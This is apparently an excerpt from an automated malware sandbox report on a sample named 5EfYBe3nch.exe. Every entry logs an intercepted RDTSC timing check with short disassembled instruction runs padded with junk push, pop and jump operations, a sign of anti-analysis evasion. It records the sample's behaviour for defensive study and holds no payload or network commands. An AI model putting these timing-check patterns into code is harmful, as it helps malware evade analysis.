Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: BFFA95 second address: BFFA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C00333 second address: C00338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C00338 second address: C00343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C00343 second address: C00347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C064F6 second address: C064FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C064FA second address: C0651F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD668F2A648h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C0668B second address: C06691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C06691 second address: C0669B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C0669B second address: C066AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD668F2A76Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C06947 second address: C0694D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C0694D second address: C06965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD668F2A76Ah 0x0000000d jng 00007FD668F2A766h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C06965 second address: C06969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C06C47 second address: C06C63 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD668F2A76Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C06E19 second address: C06E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 jmp 00007FD668F2A644h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C073D3 second address: C073D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C073D9 second address: C073DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C073DF second address: C073E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C079AA second address: C079AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C096FE second address: C09731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FD668F2A78Ch 0x0000000f jmp 00007FD668F2A774h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FD668F2A766h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C09731 second address: C09735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C1074B second address: C10751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C10751 second address: C10755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C115A9 second address: C115C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD668F2A766h 0x0000000a jnc 00007FD668F2A76Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FD668F2A766h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C11887 second address: C11896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FD668F2A636h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C141B5 second address: C141B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: B7B73A second address: B7B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: B7B740 second address: B7B745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16AD7 second address: C16ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16ADD second address: C16AE7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16DB9 second address: C16DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16DBD second address: C16DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD668F2A768h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16DCD second address: C16DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16DD2 second address: C16E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A772h 0x00000009 jng 00007FD668F2A766h 0x0000000f jmp 00007FD668F2A779h 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007FD668F2A766h 0x0000001c jno 00007FD668F2A766h 0x00000022 jnc 00007FD668F2A766h 0x00000028 popad 0x00000029 pop edx 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16E23 second address: C16E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C16E29 second address: C16E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Fh 0x00000009 popad 0x0000000a jmp 00007FD668F2A778h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C1AF07 second address: C1AF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe RDTSC instruction interceptor: First address: C1AF0D second address: C1AF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1A67B second address: C1A693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 je 00007FD668F2A636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1A92C second address: C1A941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007FD668F2A76Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1AC18 second address: C1AC2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20258 second address: C20260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20379 second address: C2037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2037D second address: C20386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20386 second address: C20391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20391 second address: C20395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20395 second address: C203C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD668F2A63Dh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FD668F2A644h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C203C4 second address: C203D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD668F2A76Fh 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2051D second address: C20545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD668F2A648h 0x0000000b pop esi 0x0000000c ja 00007FD668F2A65Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2592E second address: C25932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25932 second address: C25949 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jbe 00007FD668F2A636h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25949 second address: C2595A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jng 00007FD668F2A79Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2595A second address: C25960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C62 second address: C24C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C67 second address: C24C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A645h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD668F2A636h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24C88 second address: C24C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C24DD4 second address: C24DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25203 second address: C25208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C254E3 second address: C254E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C254E7 second address: C254F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B2F3 second address: C2B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B2FB second address: C2B304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2B494 second address: C2B4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007FD668F2A636h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BAD0 second address: C2BAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A775h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BDA9 second address: C2BDB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD668F2A636h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2BDB3 second address: C2BDC3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD668F2A768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CB78 second address: C2CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CB7E second address: C2CBA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD668F2A76Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD668F2A770h 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CBA3 second address: C2CBCB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FD668F2A636h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jnc 00007FD668F2A63Eh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2CBCB second address: C2CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8744E second address: B87467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD668F2A636h 0x0000000a jmp 00007FD668F2A63Fh 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B87467 second address: B8749E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jl 00007FD668F2A766h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FD668F2A77Ch 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B8749E second address: B874A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B874A4 second address: B874A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B874A9 second address: B874AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32768 second address: C32779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FD668F2A768h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32779 second address: C3278F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A642h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32BF9 second address: C32C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32C0C second address: C32C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD668F2A63Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32DC0 second address: C32DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32F39 second address: C32F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD668F2A641h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C32F51 second address: C32F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3309D second address: C330B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007FD668F2A636h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnc 00007FD668F2A636h 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3322D second address: C33243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Bh 0x00000009 jg 00007FD668F2A766h 0x0000000f popad 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C33243 second address: C3326A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD668F2A64Dh 0x00000008 jmp 00007FD668F2A645h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FD668F2A636h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3326A second address: C3326E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C414EB second address: C41513 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD668F2A63Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FD668F2A638h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 je 00007FD668F2A636h 0x0000001d push edx 0x0000001e pop edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C41513 second address: C4151E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4151E second address: C41524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C41524 second address: C4152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3F8F7 second address: C3F8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FCFC second address: C3FD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD00 second address: C3FD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD0A second address: C3FD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD10 second address: C3FD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3FD14 second address: C3FD2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4012C second address: C40144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A63Eh 0x00000009 js 00007FD668F2A636h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C4138A second address: C4138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C3F2FB second address: C3F302 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
